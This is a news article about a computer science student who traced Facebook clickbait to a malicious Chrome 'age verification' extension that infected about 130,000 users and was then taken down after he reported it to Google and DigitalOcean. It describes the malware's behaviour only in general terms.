Isn`t it strange that all of a sudden a Facebook friend`s feed is flooded with obscene clickbait and sketchy links? Maxime Kjaer, a 19-year-old computer science student at Swiss Federal Institute of Technology, decided to answer that question after noticing a friend`s Facebook page covered with Likes for a link called “Basic Kissing Tips”.
“Intrigued, I decided to go down the rabbit hole and see what this was all about.” blogged Kjaer.
He found a Google Chrome malware, in his own words, a “glaring security hole”, that infects the browser via a fake age verification extension. The first thing he did was ‘liking’ his friend`s raunchy link and he was immediately asked to verify his age by installing the Viral Content Age Verify Chrome browser extension. Via the malware all your data on the websites can be read and changed – your emails, login data and even your credit card information. Alongside the installation a file, called manifest.json started running through three scripts (background.js, query-string.js and install.js). Only the install.js script is harmful as it picks up the malware from two URL`s, the first of which is to receive instructions and the second to report back to it.
The first thing Kjaer was instructed to do was to like a Facebook page, called VVideosss which gave the malware developers access to his username and password and the ability to control his profile. Once he did that what he was told he noticed that the malware reported back with all the collected information – the PC identification, the version of the extension you are infected with and even whether or not you are currently logged into Facebook.
Both Google and the servers` hosting company, DigitalOcean, were immediately notified of the problem and they took down the servers and stopped the extensions. However, the Viral Content Age Verify extension with its nine versions, had managed to infect over 130,000 users before being blacklisted.
“All the machines technically remain infected, but the malware will be defused. Still, that’s a patched security vulnerability on 130,000 machines at once. A drop in the ocean compared to the size of the Internet, but still a decent catch if you ask me.” Kjaer said.
Kajer even got a reply from Google to confirm that they had blocked the extensions and assured him that they had been automatically deleted from the infected machines as well. He did not decry their move but still scolded them for not improving their security approach.
“The fact is that the current malware detection on the Chrome Webstore is a joke,” he stated, “Currently, all it takes to get around it is to download the payload on installation rather than shipping with it. This has been the case for years now, and it doesn’t seem like Google is doing much about it. They offer 5-digit bug bounties for vulnerabilities in Chrome, and yet they leave this glaring security hole virtually unguarded!”